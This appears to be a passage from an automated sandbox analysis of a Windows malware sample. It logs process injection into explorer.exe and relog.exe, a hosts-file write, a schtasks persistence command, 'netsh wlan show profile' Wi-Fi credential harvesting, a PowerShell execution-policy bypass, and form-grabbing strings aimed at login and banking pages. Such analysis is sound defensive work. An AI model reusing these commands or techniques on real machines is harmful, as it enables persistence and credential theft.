                      Source: C:\Windows\explorer.exeCode function: 2_2_0F3FE6F0 ??3@YAXPEAX@Z,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,2_2_0F3FE6F0
                      Source: C:\Windows\System32\relog.exeCode function: 47_2_00007FF6AA333084 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,47_2_00007FF6AA333084
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: 52_2_00007FF7C9B03084 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,52_2_00007FF7C9B03084
                      Source: C:\Windows\System32\relog.exeCode function: 53_2_00007FF7AE483084 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,53_2_00007FF7AE483084
                      Source: C:\Windows\System32\relog.exeCode function: 55_2_00007FF7C07C3084 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,55_2_00007FF7C07C3084
                      Source: C:\Windows\System32\relog.exeThread created: C:\Windows\explorer.exe EIP: 8B9AD08Jump to behavior
                      Source: C:\Windows\System32\relog.exeThread created: C:\Windows\explorer.exe EIP: C3696E0Jump to behavior
                      Source: C:\Windows\System32\relog.exeMemory written: C:\Windows\explorer.exe base: C350000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\relog.exeMemory written: C:\Windows\explorer.exe base: 8B90000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\relog.exeMemory written: PID: 2580 base: C350000 value: 4DJump to behavior
                      Source: C:\Windows\System32\relog.exeMemory written: PID: 2580 base: 8B90000 value: 4DJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: NULL target: C:\Windows\System32\relog.exe protection: readonlyJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeSection loaded: NULL target: C:\Windows\System32\relog.exe protection: readonly
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeSection loaded: NULL target: C:\Windows\System32\relog.exe protection: readonly
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeSection loaded: NULL target: C:\Windows\System32\relog.exe protection: readonly
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeThread register set: target process: 7152Jump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeThread register set: target process: 7536
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeThread register set: target process: 7032
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeThread register set: target process: 4916
                      Source: C:\Windows\System32\relog.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeMemory written: C:\Windows\System32\relog.exe base: F840DC1010Jump to behavior
                      Source: C:\Windows\System32\relog.exeMemory written: C:\Windows\explorer.exe base: C350000Jump to behavior
                      Source: C:\Windows\System32\relog.exeMemory written: C:\Windows\explorer.exe base: 8B90000Jump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeMemory written: C:\Windows\System32\relog.exe base: 84A9170010
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeMemory written: C:\Windows\System32\relog.exe base: DD079A5010
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeMemory written: C:\Windows\System32\relog.exe base: B2591DE010
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeProcess created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /tn ACCC Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 07:32 /du 23:59 /sc daily /ri 1 /fJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4F89.tmp.bat""Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                      Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 7
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp7CD3.tmp.bat""
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                      Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"' & exit
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeProcess created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jqnnpe.exe"'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\jqnnpe.exe "C:\Users\user\AppData\Local\Temp\jqnnpe.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeProcess created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeProcess created: C:\Windows\System32\relog.exe C:\Windows\system32\relog.exe
                      Source: explorer.exe, 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, update[1].pack.1.drBinary or memory string: Host: http(s)://form|%s|%s|%d|info|%d|%d|%d|%d|%s|%s|%d|%dMozilla\\.\pipe\%sopenAs we walked along the flatblock marina, I was calm on the outside, but thinking all the time. So now it was to be Georgie the general, saying what we should do and what not to do, and Dim as his mindless greeding bulldog. But suddenly I viddied that thinking was for the gloopy ones and that the oomny ones use, like, inspiration and what Bog sends. For now it was lovely music that came to my aid. There was a window open with the stereo on and I viddied right at once what to do.Shell_TrayWndverclsid.exe3264child.dllTrusteer?{%08lX%04lX%lu}\*...0 jnn-pa.googleapis.com.googlevideo.com.gstatic.comgoogleapis.com/js//recaptcha/GET/images//img//css//vendors//assets//domainreliability/PRI * HTTP/2.0POST/login/login.php/auth/register/sign/sign-in/account/bank/Login/checkout/payment/billingorder.php"
                      Source: explorer.exe, explorer.exe, 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1784847997.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000002.00000002.3139934605.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1783373685.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000002.00000002.3134385875.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1783065410.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
                      Source: explorer.exe, 00000002.00000002.3139934605.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1783373685.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000002.00000002.3139934605.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1783373685.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager

                      Language, Device and Operating System Detection

                      barindex
                      Source: Yara matchFile source: 00000005.00000002.1941590624.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2548612553.0000000002897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.2548612553.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.3143963860.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 3CBD.tmp.Installer.exe PID: 6828, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: accc.exe PID: 7324, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: accc.exe PID: 6896, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: 0_2_00007FF68A18F1A8 cpuid 0_2_00007FF68A18F1A8
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,0_2_00007FF68A199358
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,_invoke_watson,0_2_00007FF68A190CD0
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,0_2_00007FF68A198D34
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,0_2_00007FF68A1991A0
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: GetLocaleInfoEx,0_2_00007FF68A199254
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00007FF68A196F50
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: EnumSystemLocalesEx,0_2_00007FF68A196FB8
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,0_2_00007FF68A196DF4
                      Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,2_2_0C377588
                      Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_0C375E2C
                      Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,2_2_0C376E00
                      Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,2_2_0C36CF8C
                      Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,_invoke_watson,2_2_0C36E830
                      Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,2_2_0C376874
                      Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,2_2_0F3E8F1C
                      Source: C:\Windows\explorer.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,2_2_0F3E9540
                      Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,2_2_0F3E943C
                      Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,_invoke_watson,2_2_0F3DF430
                      Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,2_2_0F3E7474
                      Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,2_2_0F3DDB8C
                      Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,2_2_0F3E9388
                      Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_0F3E6A2C
                      Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,2_2_0F3E7A00
                      Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,2_2_0F3EF1A0
                      Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,2_2_0F3E8188
                      Source: C:\Windows\explorer.exeCode function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,2_2_0F3E48F4
                      Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,2_2_0F3E68D0
                      Source: C:\Windows\System32\relog.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,47_2_00007FF6AA349358
                      Source: C:\Windows\System32\relog.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,47_2_00007FF6AA348D34
                      Source: C:\Windows\System32\relog.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,_invoke_watson,47_2_00007FF6AA340CD0
                      Source: C:\Windows\System32\relog.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,47_2_00007FF6AA3491A0
                      Source: C:\Windows\System32\relog.exeCode function: GetLocaleInfoEx,47_2_00007FF6AA349254
                      Source: C:\Windows\System32\relog.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,47_2_00007FF6AA346F50
                      Source: C:\Windows\System32\relog.exeCode function: EnumSystemLocalesEx,47_2_00007FF6AA346FB8
                      Source: C:\Windows\System32\relog.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,47_2_00007FF6AA346DF4
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: GetLocaleInfoEx,52_2_00007FF7C9B19254
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,52_2_00007FF7C9B191A0
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,_invoke_watson,52_2_00007FF7C9B10CD0
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,52_2_00007FF7C9B19358
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,52_2_00007FF7C9B16DF4
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,52_2_00007FF7C9B18D34
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: EnumSystemLocalesEx,52_2_00007FF7C9B16FB8
                      Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,52_2_00007FF7C9B16F50
                      Source: C:\Windows\System32\relog.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,53_2_00007FF7AE496F50
                      Source: C:\Windows\System32\relog.exeCode function: EnumSystemLocalesEx,53_2_00007FF7AE496FB8
                      Source: C:\Windows\System32\relog.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,53_2_00007FF7AE498D34
                      Source: C:\Windows\System32\relog.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,53_2_00007FF7AE496DF4
                      Source: C:\Windows\System32\relog.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,53_2_00007FF7AE499358
                      Source: C:\Windows\System32\relog.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,_invoke_watson,53_2_00007FF7AE490CD0
                      Source: C:\Windows\System32\relog.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,53_2_00007FF7AE4991A0
                      Source: C:\Windows\System32\relog.exeCode function: GetLocaleInfoEx,53_2_00007FF7AE499254
                      Source: C:\Windows\System32\relog.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,55_2_00007FF7C07D91A0
                      Source: C:\Windows\System32\relog.exeCode function: GetLocaleInfoEx,55_2_00007FF7C07D9254
                      Source: C:\Windows\System32\relog.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,55_2_00007FF7C07D9358
                      Source: C:\Windows\System32\relog.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,_invoke_watson,55_2_00007FF7C07D0CD0
                      Source: C:\Windows\System32\relog.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,55_2_00007FF7C07D6DF4
                      Source: C:\Windows\System32\relog.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,55_2_00007FF7C07D8D34
                      Source: C:\Windows\System32\relog.exeCode function: EnumSystemLocalesEx,55_2_00007FF7C07D6FB8
                      Source: C:\Windows\System32\relog.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,55_2_00007FF7C07D6F50
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\xj40xovMsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
